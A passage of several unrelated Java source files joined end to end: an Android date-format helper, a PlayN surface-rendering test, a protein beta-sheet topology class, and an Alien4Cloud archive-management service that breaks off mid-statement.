                    break;
                }
            } else {
                i++;
                count++;
            }
        }

        return count;
    }

    /**
     * Given a format string and a {@link java.util.Calendar} object, returns a CharSequence
     * containing the requested date.
     * @param inFormat the format string, as described in {@link android.text.format.DateFormat}
     * @param inDate the date to format
     * @return a {@link CharSequence} containing the requested text
     */
    public static CharSequence format(CharSequence inFormat, Calendar inDate) {
        // The pattern is edited in place: each run of format chars is replaced by its
        // expansion, and 'count'/'len' are recomputed so the loop resumes after it.
        SpannableStringBuilder s = new SpannableStringBuilder(inFormat);
        int count;

        LocaleData localeData = LocaleData.get(Locale.getDefault());

        int len = inFormat.length();

        for (int i = 0; i < len; i += count) {
            count = 1;
            int c = s.charAt(i);

            if (c == QUOTE) {
                count = appendQuotedText(s, i, len);
                len = s.length();
                continue;
            }

            // Measure the run length of the repeated format character.
            while ((i + count < len) && (s.charAt(i + count) == c)) {
                count++;
            }

            String replacement;
            switch (c) {
                case 'A':
                case 'a':
                    replacement = localeData.amPm[inDate.get(Calendar.AM_PM) - Calendar.AM];
                    break;
                case 'd':
                    replacement = zeroPad(inDate.get(Calendar.DATE), count);
                    break;
                case 'c':
                case 'E':
                    replacement = getDayOfWeekString(localeData,
                                                     inDate.get(Calendar.DAY_OF_WEEK), count, c);
                    break;
                case 'K': // hour in am/pm (0-11)
                case 'h': // hour in am/pm (1-12)
                    {
                        int hour = inDate.get(Calendar.HOUR);
                        if (c == 'h' && hour == 0) {
                            hour = 12;
                        }
                        replacement = zeroPad(hour, count);
                    }
                    break;
                case 'H': // hour in day (0-23)
                case 'k': // hour in day (1-24) [but see note below]
                    {
                        int hour = inDate.get(Calendar.HOUR_OF_DAY);
                        // Historically on Android 'k' was interpreted as 'H', which wasn't
                        // implemented, so pretty much all callers that want to format 24-hour
                        // times are abusing 'k'. http://b/8359981.
                        if (false && c == 'k' && hour == 0) {
                            hour = 24;
                        }
                        replacement = zeroPad(hour, count);
                    }
                    break;
                case 'L':
                case 'M':
                    replacement = getMonthString(localeData, inDate.get(Calendar.MONTH), count, c);
                    break;
                case 'm':
                    replacement = zeroPad(inDate.get(Calendar.MINUTE), count);
                    break;
                case 's':
                    replacement = zeroPad(inDate.get(Calendar.SECOND), count);
                    break;
                case 'y':
                    replacement = getYearString(inDate.get(Calendar.YEAR), count);
                    break;
                case 'z':
                    replacement = getTimeZoneString(inDate, count);
                    break;
                default:
                    replacement = null;
                    break;
            }

            if (replacement != null) {
                s.replace(i, i + count, replacement);
                count = replacement.length(); // CARE: count is used in the for loop above
                len = s.length();
            }
        }

        if (inFormat instanceof Spanned) {
            return new SpannedString(s);
        } else {
            return s.toString();
        }
    }

    // Selects tiny/long/short weekday names by run length; 'c' means stand-alone form.
    private static String getDayOfWeekString(LocaleData ld, int day, int count, int kind) {
        boolean standalone = (kind == 'c');
        if (count == 5) {
            return standalone ? ld.tinyStandAloneWeekdayNames[day] : ld.tinyWeekdayNames[day];
        } else if (count == 4) {
            return standalone ? ld.longStandAloneWeekdayNames[day] : ld.longWeekdayNames[day];
        } else {
            return standalone ? ld.shortStandAloneWeekdayNames[day] : ld.shortWeekdayNames[day];
        }
    }

    // Selects tiny/long/short month names by run length; 'L' means stand-alone form.
    // One or two chars produce the numeric (1-based) month instead.
    private static String getMonthString(LocaleData ld, int month, int count, int kind) {
        boolean standalone = (kind == 'L');
        if (count == 5) {
            return standalone ? ld.tinyStandAloneMonthNames[month] : ld.tinyMonthNames[month];
        } else if (count == 4) {
            return standalone ? ld.longStandAloneMonthNames[month] : ld.longMonthNames[month];
        } else if (count == 3) {
            return standalone ? ld.shortStandAloneMonthNames[month] : ld.shortMonthNames[month];
        } else {
            // Calendar.JANUARY == 0, so add 1 to month.
            return zeroPad(month+1, count);
        }
    }

    // Short run: numeric GMT offset; longer run: the zone's short display name.
    private static String getTimeZoneString(Calendar inDate, int count) {
        TimeZone tz = inDate.getTimeZone();
        if (count < 2) { // FIXME: shouldn't this be <= 2 ?
            return formatZoneOffset(inDate.get(Calendar.DST_OFFSET) +
                                    inDate.get(Calendar.ZONE_OFFSET),
                                    count);
        } else {
            boolean dst = inDate.get(Calendar.DST_OFFSET) != 0;
            return tz.getDisplayName(dst, TimeZone.SHORT);
        }
    }

    // Renders a zone offset in milliseconds as "+HHMM" / "-HHMM".
    private static String formatZoneOffset(int offset, int count) {
        offset /= 1000; // milliseconds to seconds
        StringBuilder tb = new StringBuilder();

        if (offset < 0) {
            tb.insert(0, "-");
            offset = -offset;
        } else {
            tb.insert(0, "+");
        }

        int hours = offset / 3600;
        int minutes = (offset % 3600) / 60;

        tb.append(zeroPad(hours, 2));
        tb.append(zeroPad(minutes, 2));
        return tb.toString();
    }

    // 'yy' (or 'y') gives the 2-digit year; anything longer gives the full year.
    private static String getYearString(int year, int count) {
        return (count <= 2) ? zeroPad(year % 100, 2)
                            : String.format(Locale.getDefault(), "%d", year);
    }

    // Collapses a quoted section in place (removing the surrounding quotes and
    // resolving "''" escapes) and returns the number of literal chars kept.
    private static int appendQuotedText(SpannableStringBuilder s, int i, int len) {
        if (i + 1 < len && s.charAt(i + 1) == QUOTE) {
            s.delete(i, i + 1);
            return 1;
        }

        int count = 0;

        // delete leading quote
        s.delete(i, i + 1);
        len--;

        while (i < len) {
            char c = s.charAt(i);

            if (c == QUOTE) {
                //  QUOTEQUOTE -> QUOTE
                if (i + 1 < len && s.charAt(i + 1) == QUOTE) {
                    s.delete(i, i + 1);
                    len--;
                    count++;
                    i++;
                } else {
                    //  Closing QUOTE ends quoted text copying
                    s.delete(i, i + 1);
                    break;
                }
            } else {
                i++;
                count++;
            }
        }

        return count;
    }

    // Left-pads 'inValue' with zeros to at least 'inMinDigits' digits.
    private static String zeroPad(int inValue, int inMinDigits) {
        return String.format(Locale.getDefault(), "%0" + inMinDigits + "d", inValue);
    }
}
//
// $Id$

package playn.tests.core;

import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

import pythagoras.f.AffineTransform;
import pythagoras.f.FloatMath;
import pythagoras.f.Rectangle;
import react.RFuture;
import react.Slot;
import react.UnitSlot;

import playn.core.*;
import playn.scene.*;

/**
 * Exercises various {@link Surface} rendering features: wide lines, alpha blending,
 * pattern fills, sliced triangle batches, clipped pattern fills, and surfaces that
 * are re-rendered every frame.
 */
public class SurfaceTest extends Test {

  // Surface re-rendered on every paint tick; created in addTests, released in dispose.
  private TextureSurface paintUpped;

  public SurfaceTest (TestsGame game) {
    super(game, "Surface", "Tests various Surface rendering features.");
  }

  /**
   * Loads the two test images, wires up error reporting, and builds the test
   * layers once both images have loaded.
   */
  @Override public void init() {
    final Image tile = game.assets.getImage("images/tile.png");
    final Image orange = game.assets.getImage("images/orange.png");
    // Displays each load failure on screen, stacking messages downward.
    Slot<Throwable> onError = new Slot<Throwable>() {
      float errY = 0;
      public void onEmit (Throwable err) {
        addDescrip("Error: " + err.getMessage(), 10, errY, game.graphics.viewSize.width()-20);
        errY += 30;
      }
    };
    tile.state.onFailure(onError);
    orange.state.onFailure(onError);
    RFuture.collect(Arrays.asList(tile.state, orange.state)).
      onSuccess(imgs -> addTests(orange, tile));
  }

  /** Releases the per-frame surface along with the base class's resources. */
  @Override public void dispose() {
    super.dispose();
    if (paintUpped != null) {
      paintUpped.close();
      paintUpped = null;
    }
  }

  // Builds every test layer; 'orange' is drawn directly, 'tile' becomes a repeating pattern.
  protected void addTests (final Image orange, Image tile) {
    final Texture otex = orange.texture();
    final Texture ttex = tile.createTexture(Texture.Config.DEFAULT.repeat(true, true));

    // make samples big enough to force a buffer size increase
    final int samples = 128, hsamples = samples/2;
    final float[] verts = new float[(samples+1)*4];
    final int[] indices = new int[samples*6];
    tessellateCurve(0, 40*(float)Math.PI, verts, indices, x -> (float)Math.sin(x/20)*50);

    float ygap = 20, ypos = 10;

    // draw some wide lines
    ypos = ygap + addTest(10, ypos, new Layer() {
      protected void paintImpl (Surface surf) {
        drawLine(surf, 0, 0, 50, 50, 15);
        drawLine(surf, 70, 50, 120, 0, 10);
        drawLine(surf, 0, 70, 120, 120, 10);
      }
    }, 120, 120, "drawLine with width");

    ypos = ygap + addTest(20, ypos, new Layer() {
      protected void paintImpl (Surface surf) {
        surf.setFillColor(0xFF0000FF).fillRect(0, 0, 100, 25);
        // these two alpha fills should look the same
        surf.setFillColor(0x80FF0000).fillRect(0, 0, 50, 25);
        surf.setAlpha(0.5f).setFillColor(0xFFFF0000).fillRect(50, 0, 50, 25).setAlpha(1f);
      }
    }, 100, 25, "left and right half both same color");

    ypos = ygap + addTest(20, ypos, new Layer() {
      protected void paintImpl (Surface surf) {
        surf.setFillColor(0xFF0000FF).fillRect(0, 0, 100, 50);
        surf.setAlpha(0.5f);
        surf.fillRect(0, 50, 50, 50);
        surf.draw(otex, 55, 5);
        surf.draw(otex, 55, 55);
        surf.setAlpha(1f);
      }
    }, 100, 100, "fillRect and drawImage at 50% alpha");

    ypos = 10;

    final TriangleBatch triangleBatch = new TriangleBatch(game.graphics.gl);
    final AffineTransform af = new AffineTransform().
      scale(game.graphics.scale().factor, game.graphics.scale().factor).
      translate(160, (ygap + 150));

    ypos = ygap + addTest(160, ypos, new Layer() {
      protected void paintImpl (Surface surf) {
        // fill some shapes with patterns
        surf.setFillPattern(ttex).fillRect(10, 0, 100, 100);
        // render a sliding window of half of our triangles to test the slice rendering
        triangleBatch.addTris(ttex, Tint.NOOP_TINT, af,
                              verts, offset*4, (hsamples+1)*4, ttex.width(), ttex.height(),
                              indices, offset*6, hsamples*6, offset*2);
        // Bounce the window back and forth across the full sample range.
        offset += doff;
        if (offset == 0) doff = 1;
        else if (offset == hsamples) doff = -1;
      }
      private int offset = 0, doff = 1;
    }.setBatch(triangleBatch), 120, 210, "ImmediateLayer patterned fillRect, fillTriangles");

    // Render a pattern fill once into an off-screen surface and display its texture.
    TextureSurface patted = game.createSurface(100, 100);
    patted.begin().clear().setFillPattern(ttex).fillRect(0, 0, 100, 100).end().close();
    ypos = ygap + addTest(170, ypos, new ImageLayer(patted.texture),
                          "SurfaceImage patterned fillRect");

    ypos = 10;

    // fill a patterned quad in a clipped group layer
    final int twidth = 150, theight = 75;
    GroupLayer group = new GroupLayer();
    ypos = ygap + addTest(315, 10, group, twidth, theight,
                          "Clipped pattern should not exceed grey rectangle");
    group.add(new Layer() {
      protected void paintImpl (Surface surf) {
        surf.setFillColor(0xFFCCCCCC).fillRect(0, 0, twidth, theight);
      }
    });
    group.add(new ClippedLayer(twidth, theight) {
      protected void paintClipped (Surface surf) {
        // Deliberately overdraws the bounds; the clip should trim it.
        surf.setFillPattern(ttex).fillRect(-10, -10, twidth+20, theight+20);
      }
    });

    // add a surface layer that is updated on every call to paint
    // (a bad practice, but one that should actually work)
    paintUpped = game.createSurface(100, 100);
    ypos = ygap + addTest(315, ypos, new ImageLayer(paintUpped.texture),
                          "SurfaceImage updated in paint()");

    // draw some randomly jiggling dots inside a bounded region
    final List<ImageLayer> dots = new ArrayList<ImageLayer>();
    final Rectangle dotBox = new Rectangle(315, ypos, 200, 100);
    ypos = ygap + addTest(dotBox.x, dotBox.y, new Layer() {
      protected void paintImpl (Surface surf) {
        surf.setFillColor(0xFFCCCCCC).fillRect(0, 0, dotBox.width, dotBox.height);
      }
    }, dotBox.width, dotBox.height, "Randomly positioned SurfaceImages");
    for (int ii = 0; ii < 10; ii++) {
      // Each dot is a 10x10 red/blue checker rendered once into its own surface.
      TextureSurface dot = game.createSurface(10, 10);
      dot.begin().
        setFillColor(0xFFFF0000).fillRect(0, 0, 5, 5).fillRect(5, 5, 5, 5).
        setFillColor(0xFF0000FF).fillRect(5, 0, 5, 5).fillRect(0, 5, 5, 5).
        end().close();
      ImageLayer dotl = new ImageLayer(dot.texture);
      dotl.setTranslation(dotBox.x + (float)Math.random()*(dotBox.width-10),
                          dotBox.y + (float)Math.random()*(dotBox.height-10));
      dots.add(dotl);
      game.rootLayer.add(dotl);
    }

    // Per-frame work: occasionally reposition dots, and repaint 'paintUpped' with
    // colors derived from the clock so the two squares pulse in opposition.
    conns.add(game.paint.connect(clock -> {
      for (ImageLayer dot : dots) {
        if (Math.random() > 0.95) {
          dot.setTranslation(dotBox.x + (float)Math.random()*(dotBox.width-10),
                             dotBox.y + (float)Math.random()*(dotBox.height-10));
        }
      }

      float now = clock.tick/1000f;
      float sin = Math.abs(FloatMath.sin(now)), cos = Math.abs(FloatMath.cos(now));
      int sinColor = (int)(sin * 255), cosColor = (int)(cos * 255);
      int c1 = (0xFF << 24) | (sinColor << 16) | (cosColor << 8);
      int c2 = (0xFF << 24) | (cosColor << 16) | (sinColor << 8);
      paintUpped.begin().clear().
        setFillColor(c1).fillRect(0, 0, 50, 50).
        setFillColor(c2).fillRect(50, 50, 50, 50).
        end();
    }));
  }

  // Draws the segment's bounding box, the wide line itself, and 1px endpoint markers.
  void drawLine(Surface surf, float x1, float y1, float x2, float y2, float width) {
    float xmin = Math.min(x1, x2), xmax = Math.max(x1, x2);
    float ymin = Math.min(y1, y2), ymax = Math.max(y1, y2);
    surf.setFillColor(0xFF0000AA).fillRect(xmin, ymin, xmax-xmin, ymax-ymin);
    surf.setFillColor(0xFF99FFCC).drawLine(x1, y1, x2, y2, width);
    surf.setFillColor(0xFFFF0000).fillRect(x1, y1, 1, 1).fillRect(x2, y2, 1, 1);
  }

  // Simple float -> float function used to shape the tessellated curve.
  private interface F {
    public float apply (float x);
  }

  // Fills 'verts' with (x, 0)/(x, f(x)) vertex pairs sampled across [minx, maxx]
  // and 'indices' with two triangles per slice forming a ribbon under the curve.
  void tessellateCurve (float minx, float maxx, float[] verts, int[] indices, F f) {
    int slices = (verts.length-1)/4, vv = 0;
    float dx = (maxx-minx)/slices;
    for (float x = minx; vv < verts.length; x += dx) {
      verts[vv++] = x;
      verts[vv++] = 0;
      verts[vv++] = x;
      verts[vv++] = f.apply(x);
    }
    for (int ss = 0, ii = 0; ss < slices; ss++) {
      int base = ss*2;
      indices[ii++] = base;
      indices[ii++] = base+1;
      indices[ii++] = base+3;
      indices[ii++] = base;
      indices[ii++] = base+3;
      indices[ii++] = base+2;
    }
  }
}
package ProGAL.proteins.belta; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.Set; import java.util.TreeSet; /** * Representation of the topology of a single sheet. Where the BetaTopology is represented * using a pairing matrix, the sheet topology uses a list of strand pairs that can be accessed * via the public <code>strandPairs</code> field. The list of strand pairs is ordered such that * the pairs follow the order along the sheet, and the first strand from the N-terminal is in * the first half of the list. * * <code>getStrandOrder</code> and </code>getStrandOrientation</code> are alternative methods * to access the topology. The following example shows the relationship between the pairing- * matrix in the beta-topology and the order and orientation-arrays. * <pre> * SecondaryStructure ss = new SecondaryStructure(" EE EE EE EE "); * //Beta-topology with a single sheet * BetaTopology bTop = new BetaTopology(ss); * bTop.setPaired(1,0); * bTop.setPaired(2,0); * bTop.setPaired(2,3); * SheetTopology sTop = new SheetTopology(bTop,0); * System.out.println(sTop.getStrandOrderString()); //Prints "1 0 2 3" * System.out.println(sTop.getStrandOrientationString()); //Prints "1110" * </pre> * @author R.Fonseca */ public class SheetTopology{ /** The secondary structure that the sheet-topology is related to */ public final SecondaryStructure secondaryStructure; /** An ordered list of strand-pairs. The order follows the order of pairs when * "climbing" the sheet-ladder from one end to the other. The first strand from * the N-terminal is in the first half of this list. If it is in the middle, then * the second strand is in the first half. This corresponds to the convention in * Ruczinskis paper.*/ public final List<StrandPair> strandPairs = new ArrayList<StrandPair>(); /** A sorted list of strand-indices. 
A strand-index is used in the * <code>secondaryStructure.getStrands()</code>-array.*/ public final List<Integer> strands = new ArrayList<Integer>(); /** * Construct the sheet containing the specified strand. The order of the * strandPairs list will be such that the lowest index strand will be in the first * half of the list. If it is in the center the second-lowest index strand will * be in the first part of the list. */ public SheetTopology(BetaTopology bTop, int strand){ this.secondaryStructure = bTop.secondaryStructure; ArrayList<StrandPair> tmp = new ArrayList<StrandPair>(); Set<Integer> fringe = new TreeSet<Integer>(); fringe.add(strand); while(!fringe.isEmpty()){ Integer s0 = fringe.iterator().next(); fringe.remove(s0); for(int s=0;s<bTop.N;s++){ if(bTop.pair(s0,s) && !pairExists(tmp, s0,s)) { tmp.add(new StrandPair(s0,s,s<s0)); fringe.add(s); } if(bTop.pair(s,s0) && !pairExists(tmp, s0,s)){ tmp.add(new StrandPair(s0,s,s>s0)); fringe.add(s); } } } if(tmp.isEmpty()){ System.out.println("Sheet(...) tmp empty .. 
"); } //Store all strands for(StrandPair bp: tmp){ if(!strands.contains(bp.strand1)) strands.add(bp.strand1); if(!strands.contains(bp.strand2)) strands.add(bp.strand2); Collections.sort(strands); } //Sort the sheets // Find an edge strand int[] pairs = new int[bTop.N]; for(int s=0;s<bTop.N;s++) pairs[s] = 0; for(StrandPair bp: tmp){ pairs[bp.strand1]++; pairs[bp.strand2]++; } int edgeStrand = -1; for(int s=0;s<bTop.N;s++) if(pairs[s]==1){ edgeStrand = s; break; } // Sort int nextStrand = edgeStrand; if(nextStrand<0) {//Its a barrel nextStrand = tmp.get(0).strand1; while(!tmp.isEmpty()){ StrandPair nextPair = null; for(StrandPair bp: tmp) if(bp.contains(nextStrand)) { nextPair = bp; break;} strandPairs.add(nextPair); tmp.remove(nextPair); if(nextPair.strand2==nextStrand){ int t = nextPair.strand1; nextPair.strand1 = nextPair.strand2; nextPair.strand2 = t; } nextStrand = strandPairs.get(strandPairs.size()-1).strand2; } }else{ while(!tmp.isEmpty()){ StrandPair nextPair = null; for(StrandPair bp: tmp) if(bp.contains(nextStrand)) { nextPair = bp; break;} strandPairs.add(nextPair); tmp.remove(nextPair); if(nextPair.strand2==nextStrand){ int t = nextPair.strand1; nextPair.strand1 = nextPair.strand2; nextPair.strand2 = t; } nextStrand = strandPairs.get(strandPairs.size()-1).strand2; } } //Find the min-index strand and ensure that it occurs early in the list int minStrand = Integer.MAX_VALUE; int minIdx = -1, c = 0; for(StrandPair bp: strandPairs){ if(minStrand>bp.strand1) { minStrand = bp.strand1; minIdx = c; } c++; } if(strands.size()%2==1 && minIdx==(strands.size()/2)){ //Repeat for the second lowest strand; c=0; int minStrand2 = Integer.MAX_VALUE; for(StrandPair bp: strandPairs){ if(bp.strand1<minStrand2 && bp.strand1!=minStrand){ minStrand2 = bp.strand1; minIdx = c; } c++; } } if(minIdx>=strands.size()/2){ //Reverse list Collections.reverse(strandPairs); for(StrandPair bp: strandPairs) { int t=bp.strand1; bp.strand1=bp.strand2; bp.strand2 = t; } } } /** * Return true 
if the specified strand is in this sheet. * @param strand A strand-index (i.e. an index in the * <code>secondaryStructure.getStrands()</code>-array). */ public boolean containsStrand(int strand){ return strands.contains(strand); } /** * Return an array indicating the strand order. This method can be more * convenient than traversing the strand-pairs in order. */ public int[] getStrandOrder(){ int[] ret = new int[strandPairs.size()+1]; for(int i=0;i<strandPairs.size();i++) ret[i] = strandPairs.get(i).strand1; ret[ret.length-1] = strandPairs.get(strandPairs.size()-1).strand2; return ret; } /** * Return an array indicating the normalized strand order. Members of the normalized * order refers to indexes in the <code>SheetTopology.this.strands</code>-array and * not to <code>SheetTopology.this.secondaryStructure.getStrands()</code> as strand- * indices usually do. */ public int[] getNormalizedStrandOrder(){ int[] realOrder = getStrandOrder(); int[] sortedOrder = getStrandOrder(); Arrays.sort(sortedOrder); int[] normOrder = new int[sortedOrder.length]; for(int i=0;i<sortedOrder.length;i++){ normOrder[i] = indexOf(realOrder[i], sortedOrder); } return normOrder; } /** * Return an array indicating orientation of strands. A 1-entry indicates the strand * is pointing up and a 0-entry down. */ public int[] getStrandOrientation(){ boolean lastUp = true; boolean[] ups = new boolean[strands.size()]; int c=0; ups[c++] = lastUp; for(StrandPair bp: strandPairs){ if(!lastUp && !bp.parallel) lastUp = true; else if(lastUp && !bp.parallel) lastUp = false; ups[c++] = lastUp; } int minStrand = getMinStrand(); c=0; for(StrandPair bp: strandPairs){ if(bp.strand1==minStrand){ if(!ups[c]) for(c=0;c<ups.length;c++) ups[c] = !ups[c]; break; } c++; } int[] ret = new int[strands.size()]; c=0; for(Boolean up: ups) ret[c++] = up?1:0; return ret; } public String toString(){ return "Sheet< "+getStrandOrderString()+", "+getStrandOrientationString()+" >"; } /** String representation of strand order. 
*/ public String getStrandOrderString(){ StringBuilder sb = new StringBuilder(); for(StrandPair bp: strandPairs){ sb.append(bp.strand1+" "); } sb.append(strandPairs.get(strandPairs.size()-1).strand2); return sb.toString(); } /** String representation of strand orientation. */ public String getStrandOrientationString(){ StringBuilder ret = new StringBuilder(); boolean lastUp = true; boolean[] ups = new boolean[strands.size()]; int c=0; ups[c++] = lastUp; for(StrandPair bp: strandPairs){ if(!lastUp && !bp.parallel) lastUp = true; else if(lastUp && !bp.parallel) lastUp = false; if(c==strands.size()) break; ups[c++] = lastUp; } int minStrand = getMinStrand(); c=0; for(StrandPair bp: strandPairs){ if(bp.strand1==minStrand){ if(!ups[c]) for(c=0;c<ups.length;c++) ups[c] = !ups[c]; break; } c++; } for(Boolean up: ups) ret.append(up?"1":"0"); return ret.toString(); } private int getMinStrand(){ int minStrand = strandPairs.get(0).strand1; for(StrandPair bp: strandPairs){ if(bp.strand1<minStrand) minStrand = bp.strand1; } int t= strandPairs.get(strandPairs.size()-1).strand2; if(t<minStrand) minStrand = t; return minStrand; } private static int indexOf(int c, int[] array){ for(int i=0;i<array.length;i++) if(array[i]==c) return i; return -1; } private static boolean pairExists(List<StrandPair> bPairs, int s1, int s2){ for(StrandPair bp: bPairs){ if( (bp.strand1==s1 && bp.strand2==s2)||(bp.strand1==s2&&bp.strand2==s1) ) return true; } return false; } /** * A pair of strands specified by two strand-indices (i.e. indices in the * <code>secondaryStructure.getStrands()</code>-array). */ public static class StrandPair{ public int strand1, strand2; public final boolean parallel; private StrandPair(int strand1, int strand2, boolean parallel){ this.strand1 = Math.min(strand1,strand2); this.strand2 = Math.max(strand1,strand2); this.parallel = parallel; } boolean contains(int strand){ return strand1==strand || strand2==strand; } } }
package org.alien4cloud.tosca.catalog.index; import static alien4cloud.dao.FilterUtil.fromKeyValueCouples; import java.util.Date; import java.util.List; import java.util.Objects; import java.util.Set; import java.util.stream.Collectors; import javax.annotation.Resource; import javax.inject.Inject; import org.alien4cloud.tosca.catalog.ArchiveDelegateType; import org.alien4cloud.tosca.catalog.events.AfterArchiveDeleted; import org.alien4cloud.tosca.catalog.events.ArchiveUsageRequestEvent; import org.alien4cloud.tosca.catalog.events.BeforeArchiveDeleted; import org.alien4cloud.tosca.catalog.repository.CsarFileRepository; import org.alien4cloud.tosca.model.CSARDependency; import org.alien4cloud.tosca.model.Csar; import org.alien4cloud.tosca.model.templates.Topology; import org.apache.commons.lang3.ArrayUtils; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.index.query.QueryBuilders; import org.springframework.context.ApplicationEventPublisher; import org.springframework.stereotype.Component; import com.google.common.collect.Lists; import com.google.common.collect.Sets; import alien4cloud.application.ApplicationService; import alien4cloud.dao.IGenericSearchDAO; import alien4cloud.dao.model.GetMultipleDataResult; import alien4cloud.exception.AlreadyExistException; import alien4cloud.exception.DeleteReferencedObjectException; import alien4cloud.exception.NotFoundException; import alien4cloud.model.application.Application; import alien4cloud.model.common.Usage; import alien4cloud.model.orchestrators.locations.Location; import alien4cloud.utils.AlienConstants; import lombok.extern.slf4j.Slf4j; /** * Manages cloud services archives and their dependencies. 
*/ @Component @Slf4j public class CsarService { @Inject private ApplicationEventPublisher publisher; @Resource(name = "alien-es-dao") private IGenericSearchDAO csarDAO; @Inject private IToscaTypeIndexerService indexerService; @Inject private CsarFileRepository alienRepository; @Inject private ApplicationService applicationService; /** * Check if a given archive exists in any workspace. * * @param name The name of the archive. * @param version The version of the archive. * @return Return the matching */ public boolean exists(String name, String version) { return csarDAO.buildQuery(Csar.class).setFilters(fromKeyValueCouples("version", version, "name", name)).count() > 0; } /** * Check that a CSAR name/version does not already exists in the repository and eventually throw an AlreadyExistException. * * @param name The name of the archive. * @param version The version of the archive. */ public void ensureUniqueness(String name, String version) { if (exists(name, version)) { throw new AlreadyExistException("CSAR: " + name + ", Version: " + version + " already exists in the repository."); } } /** * Get a cloud service archive. * * @param name The name of the archive. * @param version The version of the archive. * @return The {@link Csar Cloud Service Archive} if found in the repository or null. */ public Csar get(String name, String version) { return csarDAO.buildQuery(Csar.class).setFilters(fromKeyValueCouples("name", name, "version", version)).prepareSearch().find(); } /** * * Get a cloud service archive. * * @param id The id of the archive to retrieve * @return */ public Csar get(String id) { return csarDAO.findById(Csar.class, id); } /** * @return an array of CSARs that depend on this name:version. 
*/ public Csar[] getDependantCsars(String name, String version) { QueryBuilder notSelf = QueryBuilders //.notQuery(QueryBuilders.andQuery(QueryBuilders.termQuery("name", name), QueryBuilders.termQuery("version", version))); .boolQuery() .mustNot ( QueryBuilders.boolQuery() .must(QueryBuilders.termQuery("name", name)) .must(QueryBuilders.termQuery("version", version))); GetMultipleDataResult<Csar> result = csarDAO.buildQuery(Csar.class).prepareSearch() .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version), notSelf).search(0, 10000); return result.getData(); } /** * Get teh topologies that depends on this csar. * Do not return a topology if this csar is his own * * @return an array of <code>Topology</code>s that depend on this name:version. */ public Topology[] getDependantTopologies(String name, String version) { QueryBuilder notSelf = QueryBuilders //.notQuery(QueryBuilders.andQuery(QueryBuilders.termQuery("archiveName", name), QueryBuilders.termQuery("archiveVersion", version))); .boolQuery() .mustNot ( QueryBuilders.boolQuery() .must(QueryBuilders.termQuery("archiveName", name)) .must(QueryBuilders.termQuery("archiveVersion", version))); GetMultipleDataResult<Topology> result = csarDAO.buildQuery(Topology.class).prepareSearch() .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version), notSelf).search(0, 10000); return result.getData(); } public List<Csar> getTopologiesCsar(Topology... topologies) { Set<String> ids = Sets.newHashSet(); for (Topology topology : topologies) { ids.add(topology.getId()); } return csarDAO.findByIds(Csar.class, ids.toArray(new String[ids.size()])); } /** * @return an array of CSARs that depend on this name:version. 
*/ public Location[] getDependantLocations(String name, String version) { GetMultipleDataResult<Location> result = csarDAO.buildQuery(Location.class) .setFilters(fromKeyValueCouples("dependencies.name", name, "dependencies.version", version)).prepareSearch().search(0, 10000); return result.getData(); } /** * Save a Cloud Service Archive in ElasticSearch. * * @param csar The csar to save. */ public void save(Csar csar) { // save the csar import date csar.setImportDate(new Date()); this.csarDAO.save(csar); } /** * Set dependencies to an existing CSAR given its Id, and save it. * <p> * See {@link CsarService#setDependencies(String, Set)} * </p> * * * @param csarId id of the CSAR * @param dependencies the new dependencies */ public void setDependencies(String csarId, Set<CSARDependency> dependencies) { Csar csar = getOrFail(csarId); setDependencies(csar, dependencies); } /** * Set the dependencies of a given csar to the provided set. * <p> * This method will remove ,if present, the provided <b>csar</b> from the provided set of <b>dependencies</b>, to avoid cyclic dependencies on itself. * </p> * Note that no saving operation is perform here * * @param csar: The csar we want to set the dependencies * @param dependencies The provided dependencies to use. */ public void setDependencies(Csar csar, Set<CSARDependency> dependencies) { csar.setDependencies(remove(csar, dependencies)); save(csar); } /** * remove a csar from a set of dependencies * * @param csar * @param from * @return */ private Set<CSARDependency> remove(Csar csar, Set<CSARDependency> from) { CSARDependency toRemove = new CSARDependency(csar.getName(), csar.getVersion()); return from == null ? 
null : from.stream().filter(csarDependency -> !Objects.equals(toRemove, csarDependency)).collect(Collectors.toSet()); } /** * Get a cloud service archive, or fail if not found * * @param id The id of the archive to retrieve * @return The {@link Csar Cloud Service Archive} if found in the repository */ public Csar getOrFail(String id) { Csar csar = get(id); if (csar == null) { throw new NotFoundException("Csar with id [" + id + "] do not exist"); } return csar; } /** * Get a cloud service archive, or fail with {@link NotFoundException} if not found * * @param name The name of the archive. * @param version The version of the archive. * @return The {@link Csar Cloud Service Archive} if found in the repository. */ public Csar getOrFail(String name, String version) { return getOrFail(Csar.createId(name, version)); } /** * @return true if the CSar is a dependency for another or used in a topology. */ public boolean isDependency(String csarName, String csarVersion) { // a csar that is a dependency of another csar Csar[] result = getDependantCsars(csarName, csarVersion); if (result != null && result.length > 0) { return true; } // check if some of the nodes are used in topologies. Topology[] topologies = getDependantTopologies(csarName, csarVersion); return topologies != null && topologies.length > 0; } /** * Delete an archive. * <p> * Unlike {@link CsarService#deleteCsar(String)}, the archive will be deleted regardless if it is used as a dependency somewhere. * </p> * * @param csarId The id of the archive to delete. */ public void forceDeleteCsar(String csarId) { Csar csar = getOrFail(csarId); deleteCsar(csar); } /** * Delete an archive if no topology depends from it. * * @param csarId The id of the archive to delete. 
* @throws DeleteReferencedObjectException If the csar is a dependency of another csar or topology */ public void deleteCsar(String csarId) { Csar csar = getOrFail(csarId); // a csar that is a dependency of another csar can not be deleted if (isDependency(csar.getName(), csar.getVersion())) { throw new DeleteReferencedObjectException("This csar can not be deleted since it's a dependencie for others"); } deleteCsar(csar); } public void deleteCsar(Csar csar) { // dispatch event before indexing publisher.publishEvent(new BeforeArchiveDeleted(this, csar.getId())); deleteCsarContent(csar); csarDAO.delete(Csar.class, csar.getId()); // physically delete files alienRepository.removeCSAR(csar.getName(), csar.getVersion()); // dispatch event before indexing publisher.publishEvent(new AfterArchiveDeleted(this, csar.getId())); } /** * Delete the content of the csar from the repository: elements, topologies * * @param csar */ public void deleteCsarContent(Csar csar) { // Delete the topology defined in this archive. csarDAO.delete(Topology.class, csar.getId()); // latest version indicator will be recomputed to match this new reality indexerService.deleteElements(csar.getName(), csar.getVersion()); } /** * Delete an archive an all its registered / saved elements * Abort the deletion if the archive is used by some resources * * @param csar * @return A List of {@link Usage} representing the resources using this archive. */ public List<Usage> deleteCsarWithElements(Csar csar) { // if the csar is bound to an application, then do not allow the process if (Objects.equals(csar.getDelegateType(), 